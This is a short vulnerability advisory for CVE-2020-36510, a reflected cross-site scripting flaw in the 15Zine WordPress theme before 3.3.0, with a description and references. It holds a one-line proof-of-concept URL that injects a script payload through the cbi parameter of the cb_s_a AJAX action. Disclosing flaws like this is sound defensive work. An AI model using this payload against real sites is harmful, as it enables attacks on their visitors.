[CVE-2020-36510] 15Zine < 3.3.0 - Reflected Cross-Site Scripting

Description

The 15Zine WordPress theme before 3.3.0 does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting.

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=cb_s_a&cbi=<script>alert(/XSS/);</script>

Software Link

15Zine Wordpress Theme

References

CVE-2020-36510
WPScan